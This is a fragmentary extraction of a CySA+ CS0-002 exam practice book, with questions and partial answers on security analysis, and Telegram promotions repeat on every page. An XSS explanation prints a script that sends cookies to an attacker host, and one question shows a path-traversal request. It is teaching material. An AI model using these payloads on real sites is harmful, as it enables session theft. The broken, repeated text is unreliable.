CySA-002 Practice Test
CySA-002 Practice Test
2
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CompTIA CySA+ CS0-002 Practice Tests 2021®
Published by: ExamsDigest LLC., Holzmarktstraße 73, Berlin, Germany,
www.examsdigest.com Copyright © 2021 by ExamsDigest LLC.
3
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CONTENTS AT A GLANCE
4
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
5
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
INTRODUCTION
CompTIA Cybersecurity Analyst (CySA+) is an IT workforce
certification that applies behavioral analytics to networks and
devices to prevent, detect and combat cybersecurity threats
through continuous security monitoring.
This book has been designed to help you prepare for the style
of questions you will receive on the CompTIA CySA+ CS0-002
exams. It also helps you understand the topics you can expect
to be tested on for each exam.
6
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
✓ Review a reference book: CompTIA CySA+ CS0-002 by
Examsdigest is designed to give you sample questions to help
you prepare for the style of questions you will receive on the
real certification exam. However, it is not a reference book that
teaches the concepts in detail. That said, I recommend that you
review a reference book before attacking these questions so
that the theory is fresh in your mind.
The online practice that comes free with this book offers you
the same questions and answers that are available here and
more.
So if you need help with the domain Network Security, then se-
lect questions related to this topic online and start practicing.
The online practice that comes free with this book offers you
the same questions and answers that are available here and
more.
9
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Exam Content
Content Outline
With the end goal of proactively defending and continuously
improving the security of an organization, CySA+ will verify the
successful candidate has the knowledge and skills required to:
• Leverage intelligence and threat detection techniques
• Analyze and interpret data
• Identify and address vulnerabilities
• Suggest preventative measures
• Effectively respond to and recover from incidents
This is equivalent to 4 years of hands-on experience in a tech-
nical cybersecurity job role.
The following topics are general guidelines for the content likely
to be included on the exam. However, other related topics may
also appear on any specific delivery of the exam. To better re-
flect the contents of the exam and for clarity purposes, the
guidelines below may change at any time without notice.
10
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 1
THREAT AND VULNERABILITY
MANAGEMENT
Questions 1-20
11
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 1. In the cybersecurity and threat intelligence indus-
tries, there are several approaches used to analyze and track
the characteristics of cyber intrusions by advanced threat ac-
tors. Which of the following approaches emphasizes the rela-
tionships and characteristics of four basic components: the ad-
versary, capabilities, infrastructure, and victims?
(A) Attack vector
(B) MITRE ATT&CK
(C) The Diamond Model of Intrusion Analysis
(D) Kill chain
12
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 3. You open the command prompt and type the fol-
lowing command to find out which ports on your system are
open. lsof -Pn -i4 | grep LISTEN After typing the command
you receive the following results.
127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)
13
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 5. In which of the following types of attacks the
unauthorized user gains access to a system or network and
remains there for an extended period of time without being de-
tected with the main goal to steal data instead of causing dam-
age to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto
14
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 7. Active Vulnerability Scanners identify the active
operating systems, applications, and ports throughout a net-
work and provide information about weaknesses but they can’t
take any action to resolve security problems. (True/False)
(A) TRUE
(B) FALSE
15
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 9. The developer of your company wrote the follow-
ing code snippet in Java to show the account numbers and
balances for the current user’s id as provided in a URL.
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts
WHERE account_owner_id =
“+request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBal-
anceQuery);
while (rs.next()) { page.addTableRow(rs.getInt("ac-
countNumber"), rs.getFloat("balance"));
}
17
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 11. You just completed an HPING scan and received
the following output:
18
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 12. The Internet of things (IoT) is a network of physi-
cal objects that are embedded with sensors, software, and oth-
er technologies for the purpose of connecting and exchanging
data with other devices and systems over the Internet. Which
of the following statements is NOT considered an IoT threat and
vulnerability.
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code
19
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 14. The developer of your company is writing soft-
ware in C language. As he is a junior software engineer he
needs your help to choose secure functions for his projects.
Which of the following functions he shouldn’t use as it is con-
sidered an insecure function?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()
20
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 16. In your company you are using a Web Vulnerabil-
ity Scanner tool named Acunetic to check whether your web-
site and web applications are vulnerable. While you were re-
viewing a scan report you saw the following URL:
http://test.webarticles.com/show.asp?view=../../../../../
Windows/system.ini HTTP/1.1
Question 19. Your company has moved any workload from its
on-premises environment to Amazon Web Services (AWS) to
benefit from substantial IT costs savings, business agility, and
operational resilience. You have been tasked to recommend a
tool that enables security posture assessment of cloud envi-
ronments. Which of the following tools should you recommend
to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver
22
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 20. You are working on an application with multiple
serverless functions and your task is to deploy a REST API us-
ing Serverless, Express, and Node.js. Which of the following
actions should you perform to ensure that a vulnerability in one
function doesn’t escalate and compromise others as well?
(A) Maintain isolated function perimeters
(B) Employ API gateways as a security buffer
(C) Secure and verify data in transit
(D) Patch function dependencies
23
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 1-20
25
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
MITRE ATT&CK is incorrect. The MITRE ATT&CK framework is
a comprehensive matrix of tactics and techniques used by
threat hunters, red teamers, and defenders to better classify at-
tacks and assess an organization’s risk.
26
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 2. Nessus, OpenVAS and Qualys are the cor-
rect answers. Vulnerability scanners are automated tools that
allow organizations to check if their networks, systems and ap-
plications have security weaknesses that could expose them to
attacks.
27
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 3. You open the command prompt and type the fol-
lowing command to find out which ports on your system are
open.
127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)
28
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 4. A malicious user exploited a bug in a system and
gained elevated access to resources that should normally be
unavailable to him. Which type of attack was conducted in that
system?
(A) Access escalation
(B) Elevated access
(C) Privilege escalation
(D) Elevated Privilege
29
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 5. In which of the following types of attacks the
unauthorized user gains access to a system or network and
remains there for an extended period of time without being de-
tected with the main goal to steal data instead of causing dam-
age to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto
30
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
At that point, it’s exploited before a fix becomes available from
its creator.
31
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ing the organization’s security practices, data and computer
systems.
32
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 7. FALSE is the correct answer. Passive Vulner-
ability Scanners identify the active operating systems, ap-
plications, and ports throughout a network and provide infor-
mation about weaknesses but they can’t take any action to re-
solve security problems.
33
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 8. You have been hired as a security analyst to con-
duct a source code analysis on different websites. After spend-
ing hours to find out if the sites are compromised or not, you
notice the following code snippet:
34
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
known vulnerability to inject script code. For an XSS attack
used for session hijacking, the code might send the session
key to the attacker’s own website, for instance:
http://www.website.com/search?<script>
location.href='http://www.VillainSite.com/hijacker.php?
cookie='+document.cookie; </script>
35
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Rootkit is incorrect. Rootkit is a term applied to a type of mal-
ware that is designed to infect a target PC and allow an attacker
to install a set of tools that grant him persistent remote access
to the computer.
36
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 9. The developer of your company wrote the follow-
ing code snippet in Java to show the account numbers and
balances for the current user’s id as provided in a URL.
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts
WHERE account_owner_id =
“+request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBal-
anceQuery);
while (rs.next()) { page.addTableRow(rs.getInt("ac-
countNumber"), rs.getFloat("balance"));}
37
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
lowing type of attacks is conducted against the website?
(A) Extensible markup language (XML) attack
(B) Overflow attack
(C) Credential stuffing
(D) Structured query language (SQL) injection
38
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Overflow attack is incorrect. Attackers exploit buffer overflow
issues by overwriting the memory of an application. This
changes the execution path of the program, triggering a re-
sponse that damages files or exposes private information. For
example, an attacker may introduce extra code, sending new
instructions to the application to gain access to IT systems.
40
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Based on these results, which of the following services re-
turned an SYN-ACK?
(A) DHCP
(B) DNS
(C) SMTP
(D) IMAP
41
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 12. The Internet of things (IoT) is a network of physi-
cal objects that are embedded with sensors, software, and oth-
er technologies for the purpose of connecting and exchanging
data with other devices and systems over the Internet. Which
of the following statements is NOT considered an IoT threat and
vulnerability.
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code
42
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 13. A telecom company may promise network avail-
ability of 99.999 percent and allow the customer to reduce
their payment by a given percentage if that is not achieved.
Which of the following agreements is described in this exam-
ple?
(A) Memorandum of understanding
(B) Service-level agreement
(C) Organizational governance
(D) Business process interruption
43
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 14. The developer of your company is writing soft-
ware in C language. As he is a junior software engineer he
needs your help to choose secure functions for his projects.
Which of the following functions he shouldn’t use as it is con-
sidered an insecure function?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()
44
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 15. While you were interpreting Assessment Reports
on Acunetix Vulnerability Scanner you identified a vulnerability
in the system with a Common Vulnerability Scoring System
(CVSS) value of (L) and a score (0.395). Based on the given
scenario, which of the following statements would be true?
(A) There is no impact on the availability of the system
(B) The attacker must either have physical access to the
vulnerable system or a local account
(C) The attacker must authenticate once in order to exploit
the vulnerability
(D) There is no impact on the confidentiality of the system
45
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
The access vector (AV) shows how vulnerability may be ex-
ploited.
46
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 16. In your company you are using a Web Vulnerabil-
ity Scanner tool named Acunetic to check whether your web-
site and web applications are vulnerable. While you were re-
viewing a scan report you saw the following URL:
http://test.webarticles.com/show.asp?view=../../../../../
Windows/system.ini HTTP/1.1
47
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
“spraying” the same password across many accounts before
trying another password.
48
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 17. An organization has hired a cybersecurity analyst
to conduct an assessment of its current wireless network secu-
rity. He has been tasked to capture the inbound and outbound
packets and export the data to text files for further processing
by third-party tools. Which of the following tools the analyst
should use to complete the task?
(A) ScoutSuite
(B) Pacu
(C) Prowler
(D) Aircrack-ng
The rest options are incorrect because they are Cloud in-
frastructure assessment tools.
49
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 18. You have been hired as a cybersecurity analyst to
conduct an assessment against the organization’s network.
Now you are in the process of trying to discover as many attack
vectors as possible that can be used to exploit the systems fur-
ther. Which of the following is the phase you are currently in?
(A) Static analysis
(B) Reverse engineering
(C) Enumaration
(D) Dynamic analysis
The rest options are incorrect because they are software as-
sessment tools and techniques.
50
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 19. Your company has moved any workload from its
on-premises environment to Amazon Web Services (AWS) to
benefit from substantial IT costs savings, business agility, and
operational resilience. You have been tasked to recommend a
tool that enables security posture assessment of cloud envi-
ronments. Which of the following tools should you recommend
to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver
51
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
- Google Cloud Platform
- Alibaba Cloud (alpha)
- Oracle Cloud Infrastructure (alpha)
The rest options are incorrect because they are wireless as-
sessment tools NOT cloud infrastructure assessment tools.
Questions 21-35
53
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 21. Α company is planning to increase the security of
its private network by adding a new security device between
the public and its private network. The device will be used as a
proxy server and will be responsible for routing the traffic be-
tween the two networks. Which of the following devices should
be installed to isolate access to the internal network?
(A) IDS
(B) IPS
(C) Jumpbox
(D) Virtual private network
54
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 23. A cybersecurity researcher is debugging a code
by examining how the application behaves during and after the
execution. Which of the following code analysis methods the
researcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps
55
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 25. A developer is building a new CRUD application
for a university. The path like university.com/students/
2/course/6 accessing the course with id 6 for the student
with id 2. This is an example of which service-oriented archi-
tecture?
(A) Security Assertions Markup Language
(B) Simple Object Access Protocol
(C) Representational State Transfer
(D) Microservices
56
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 27. As a cybersecurity analyst, you need to find a
way to fool attackers to attack networks that look like legitimate
targets with the aim to track their behavior and collect clues
that will help you make the real network more secure. Which of
the following approaches describes this scenario?
(A) Virtual desktop infrastructure
(B) Honeypot
(C) Virtual private cloud
(D) Software-defined networking
57
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 29. Students at examsdigest.com login using their
username and password. As this method has security issues
ExamsDigest's team looking for solutions to increase the secu-
rity of the login system by requiring students to provide more
evidence to prove their identity. Which of the following authen-
tication methods does ExamsDigest need to implement?
(A) Privilege management
(B) Single sign-on
(C) Multifactor authentication
(D) Active defense
58
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 31. The developer of your company just released a
new version of the registration form on the web application.
Now the username field should contain only characters and the
password field accepts special characters and numbers. This
an example of which secure coding best practices?
(A) Output encoding
(B) Input validation
(C) Session management
(D) Parameterized queries
59
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 33. The process of replacing HTML control charac-
ters (e.g. <, >, “, &, etc) into their encoded representatives (e.g.
“& lt ;” “& gt ;” “& quot ;” “& amp ;” etc..) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries
60
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 35. Which of the following are the tactics of the En-
terprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper
61
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 21-35
63
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
the stability & reliability of software applications. The goal of
Stress testing is measuring software on its robustness and error
handling capabilities under extremely heavy load conditions
and ensuring that software doesn’t crash under crunch situa-
tions. It even tests beyond normal operating points and evalu-
ates how the software works under extreme conditions.
64
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Stress test application is incorrect. Stress Testing is a type of
software testing that verifies the stability & reliability of software
applications.
65
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 24. A cybersecurity researcher is debugging a code
by examining the source code of the application before the ex-
ecution. Which of the following code analysis methods the re-
searcher is currently performing?
(A) Static code analysis
(B) Dynamic code analysis
(C) Stress test application
(D) DevSecOps
66
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
DevSecOps is incorrect. DevSecOps is the philosophy of in-
tegrating security practices within the DevOps process. Dev-
SecOps involves creating a ‘Security as Code’ culture with on-
going, flexible collaboration between release engineers and se-
curity teams. The DevSecOps movement, like DevOps itself, is
focused on creating new solutions for complex software devel-
opment processes within an agile framework.
67
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
There are 4 basic HTTP verbs we use in requests to interact
with resources in a REST system:
GET — retrieve a specific resource (by id) or a collection of re-
sources
POST — create a new resource
PUT — update a specific resource (by id)
DELETE — remove a specific resource (by id)
68
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 26. The correct answer is TRUE. A SED (or Self-
Encrypting Drive) is a type of hard drive that automatically and
continuously encrypts the data on the drive without any user
interaction. This encryption process is done through the use of
a unique and random Data Encryption Key (DEK) which the
drive uses to both encrypt and decrypt the data.
69
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
data, fooling cybercriminals into thinking it’s a legitimate target.
For example, a honeypot could mimic a company’s customer
billing system – a frequent target of attack for criminals who
want to find credit card numbers. Once the hackers are in, they
can be tracked, and their behavior assessed for clues on how
to make the real network more secure.
70
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 28. Which of the following hardware root of trust
terms is a chip that stores RSA encryption keys specific to the
host system for hardware authentication?
(A) Hardware security module
(B) Trusted Platform Module
(C) Trusted execution
(D) Processor security extensions
71
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
using the TPM’s unique RSA key, which is burned into itself.
- Help ensure platform integrity by taking and storing security
measurements.
72
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
If one of the factors has been compromised by a hacker or
unauthorized user, the chances of another factor also being
compromised are low, so requiring multiple authentication fac-
tors provides a higher level of assurance about the user’s iden-
tity.
73
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
An active defense technique is to implement honeypots to
track the behavior of attackers and collect clues that will help
you make the real network more secure.
74
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
their encoded representatives. This is the best mitigtion against
cross-site scripting attacks.
75
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 32. Mike’s organization uses a hybrid approach for
its infrastructure as they have an on-premise environment for
their services but also they use Amazon Web Services for other
services. Which of the following software tools do they need to
ensure that network traffic between on-premises devices and
the cloud provider complies with the organization’s security
policies?
(A) Virtual desktop infrastructure
(B) Cloud access security broker
(C) Simple Object Access Protocol
(D) Representational State Transfer
76
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Virtual desktop infrastructure is incorrect. Virtual desktop
infrastructure (VDI) is a technology that refers to the use of vir-
tual machines to provide and manage virtual desktops. VDI
hosts desktop environments on a centralized server and de-
ploys them to end-users on request.
77
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 33. The process of replacing HTML control charac-
ters (e.g. <, >, “, &, etc) into their encoded representatives (e.g.
“& lt ;” “& gt ;” “& quot ;” “& amp ;” etc..) is known as?
(A) Input validation
(B) Session management
(C) Output encoding
(D) Parameterized queries
79
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 34. The correct answers are:
1. Encryption of the data traffic passed between the parties
by using SSL/TLS
2. Use of a long random number or string as the session
key
3. Regenerating the session id after a successful login
Question 35. Which of the following are the tactics of the En-
terprise ATT&CK framework? (Choose all that apply.)
(A) Privilege Escalation
(B) Defense Evasion
(C) Credential Access
(D) Lateral Movement
(E) Anti-tamper
81
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
- Privilege Escalation
- Defense Evasion
- Credential Access
- Discovery
- Lateral Movement
- Collection
- Exfiltration
- Impact
82
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 3
SECURITY OPERATIONS
AND MONITORING
Questions 36-50
83
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 36. Which of the following protocols is commonly
used to collect information about CPU utilization and band-
width from network devices and automatically send the admin-
istrator an email if a predefined threshold is exceeded?
(A) HTTP
(B) SNMP
(C) DHCP
(D) SMTP
84
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 38. During a vulnerability scan, you found a serious
SQL injection vulnerability in one of your online shop that has
10,000 daily visitors. The eshop provides 99.999% availability
to customers so it can’t be taken offline to fix the SQL injection
vulnerability. Which of the following solutions should you rec-
ommend to the eshop administrators until the eshop can be
remediated?
(A) Port security
(B) WAF
(C) Honeypot
(D) Sandboxing
85
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 40. Which of the following process is designed to
trigger automatic code integration in the main code base in-
stead of developing in isolation and then integrating them at
the end of the development cycle?
(A) Continuous deployment
(B) Continuous integration
(C) Continuous monitoring
(D) Continuous delivery
86
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 42. You are conducting a log review scan to detect
the users who have been locked out from their accounts in or-
der to proceed to the recovery stage. Which of the following
sources of information would provide you with the most accu-
rate information for you to use in determining who has been
locked out or not?
(A) Event logs
(B) Firewall logs
(C) Syslog
(D) Flow analysis
87
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 44. You have been tasked to improve the wired net-
work security of the company’s network by limiting the number
of MAC addresses on a given port. Packets that have a match-
ing MAC address should be considered secure packets and
should be forwarded; all other packets (unsecured packets)
should be restricted. Which of the following features should
you implement to complete the task?
(A) Port security
(B) Network access control
(C) Sinkholing
(D) Sandboxing
88
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 46. What problems can be caused by malicious pay-
loads? (Choose all that apply.)
(A) Activity monitoring
(B) File encryption
(C) File deletion
(D) Malicious file download
(D) Steal online banking details
89
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 48. A developer is building a new corporate applica-
tion that needs to be accessed only by selective employees
based on their IP addresses. Which of the following access
control method should the developer implement?
(A) Blacklisting
(B) Port security
(C) Whitelisting
(D) Sandboxing
90
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 50. Which of the following actions should you per-
form to reduce the attack surface area of a given network or
system? (Choose all that apply.)
(A) Keep your software up to date
(B) Run a local firewall and don’t open ports you don’t need
(C) Run applications as root or as an administrator
(D) Use TLS for all network communication, even internally
(Ε) Don't sanitize configurations and inputs
91
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 36-50
93
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 37. You have set up an Intrusion detection system
(IDS) and suddenly the IDS identifies an activity as an attack
but the activity is acceptable behavior. The state, in this case, is
known as:
(A) False-positive
(B) False-negative
(C) Non-credentialed scans
(D) Credentialed scans
95
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Internet. It typically protects web applications from attacks
such as cross-site forgery, cross-site-scripting (XSS), file inclu-
sion, and SQL injection, among others. A WAF is a protocol lay-
er 7 defense (in the OSI model), and is not designed to defend
against all types of attacks.
96
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Sandboxing is incorrect. Sandboxing is a software manage-
ment strategy that isolates applications from critical system re-
sources and other programs. It provides an extra layer of secu-
rity that prevents malware or harmful applications from nega-
tively affecting your system.
97
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
end-users — your customers. But this, too, can be done by
software. Code is automatically tested for issues, and if none
are found, then the code is deployed.
98
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Continuous delivery is incorrect. Continuous delivery is an
ongoing DevOps practice of building, testing, and delivering
improvements to software code and user environments with
the help of automated tools. The key outcome of the continu-
ous delivery (CD) paradigm is code that is always in a deploy-
able state.
99
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Continuous integration is designed to trigger automatic code
integration in the main code base instead of developing in iso-
lation and then integrating them at the end of the development
cycle.
100
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
mitigate the risk of cyber attacks with a timely alert system that
triggers a rapid incident response.
101
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Syslog messages have a built-in severity level, facilitating any-
thing from level 0, an Emergency, to level 5, a Warning, and
then on to level 6 and level 7, which are Informational and De-
bugging, respectively.
104
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
